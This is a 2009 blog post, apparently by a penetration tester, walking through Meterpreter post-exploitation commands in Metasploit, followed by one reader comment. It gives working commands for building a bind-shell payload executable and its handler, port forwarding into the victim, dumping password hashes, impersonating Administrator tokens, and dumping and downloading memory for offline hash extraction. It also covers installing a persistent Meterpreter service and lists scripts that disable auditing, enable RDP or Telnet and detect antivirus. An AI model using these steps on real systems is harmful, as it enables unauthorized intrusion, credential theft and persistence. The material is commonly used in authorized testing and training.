Monday, April 20, 2009

Meterpreter Post exploitation - Recap

I have been a big fan of Meterpreter since it first version, now i would like to review the different cool things and plugins that are around for this feature of Metasploit, that covers the post-exploitation phase. As explained in the first Meterpreter paper:

Meterpreter, short for The Meta-Interpreter, is an advanced payload that is included in the Metasploit Framework. Its purpose is to provide complex and advanced features that would otherwise be tedious to implement purely in assembly. The way that it accomplishes this is by allowing developers to write their own extensions in the form of shared ob ject (DLL) files that can be uploaded and injected into a running process on a target computer after exploitation has occurred. Meterpreter and all of the extensions that it loads are executed entirely from memory and never touch the disk, thus allowing them to execute under the radar of standard Anti-Virus detection.

First of all, i would like to remark that i use Meterpreter as a standalone binary most of the times. To create a binary for uploading to a server you can use this command:

./msfpayload windows/meterpreter/bind_tcp LPORT=443 X > mymeterpreter.exe

Once uploaded the binary and executed (i leave this to you), you have to launch the multi_handler exploit to manage the connection to meterpreter, in this case:

./mscli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 E

Or inside the metasploit console:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(handler)> set LPORT 443
msf exploit(handler)> exploit

Well once we have a working connection, these are some things that you can do:

-Port forwarding: You can make port redirections,

meterpreter> portfwd -a -L -l 444 -h destiny -p 3389

-L = ip that will hold the listening port
-l = the listening port
-h = the target host
-p = the target port

Now you should connect to the exploited machine on port 444

More on forwarding and routing here


You can get the hashes of the user accounts, like the pwdump utility, for later cracking.

meterpreter> use privs (we load the privileges module)
meterpreter> hashdump

You need Admin/System privileges to work.

-User impersonation, using the token passing technique:

You can use meterpreter for performing the "pass the token" attack to impersonate another user, introduced by Luke Jennings:

meterpreter> use incognito (we load the incognito module)
meterpreter> list_tokens (we list all available sessions)
meterpreter> impersonate_token oracle-en\\Administrator (we impersonate as the user oracle-en\\Administrator)

You need Admin/System privileges to work.

If you want to revert the situation an obtain your original session, you can execute:

meterpreter> rev2self

More on working with Incognito and Meterpreter at Carnal0wnage

Dumping memory to extract hashes (using mdd.exe):

Here we first need to upload mdd.exe (Mantech)

meterpreter> upload mdd.exe .
meterpreter> execute -f mdd.exe -a "-o mydump.dd"
meterpreter> download mydump.dd .

Now we need can use volatility to:

  • cachedump Dump (decrypted) domain hashes from the registry
  • hashdump Dump (decrypted) LM and NT hashes from the registry
  • hivelist Print list of registry hives
  • hivescan Scan for _CMHIVE objects (registry hives)
  • lsadump Dump (decrypted) LSA secrets from the registry

More information on using meterpreter + mdd + volatility on Attack Research blog

Another resource for Meterpreter plugins is the DarkOperator website, where we can find some modules like:

  • Disable_Audit: Disable auditing, by changing the local security policy
  • GetGui: Script for enabling RDP service on target host.
  • GetTelnet: this script will enable the Telnet Service on Win2003 and XP, and will install it on Vista and 2008.
  • Memdump: Automation for mdd
  • WinEnum: Script that will gather a big amount of information about the host
  • Scheduleme: this will allow for task scheduling on target host. Will run the commands as System.
  • NetEnum: Performs network enumeration, ping sweeps, reverse dns lookups, etc.
  • Soundrecorder: Allows you to record sound on the target machine :)
  • GetCounterMeasure: this script will identify antivirus,HIPS,HIDS, Firewalls, etc.

You can find examples of these modules and the source code in the the Darkoperator website under the meterpreter zone, many of them are included in the Metasploit project.

Meterpreter service wrapper:

You can use Metsvc to run meterpreter as a Windows service, or as a command line application. You have to download from (Alexander Sotirov)

c:> metsvc.exe install-service (it will launch on port 31337)

Well that's all for now, i will like to thanks Chris Gates and Carlos Perez (DarkOperator) for their work with Meterpreter, a great tool for post exploitation and maybe a feature underestimated by many and unknown by others.

Also a big thanks for all the Metasploit team, for their great work.

Enjoy your post exploitation ...


1 comment:

techguru said...

Just wanted to let you know that under your instructions for "HashDump" is should be 'use priv' instead of 'use privs'.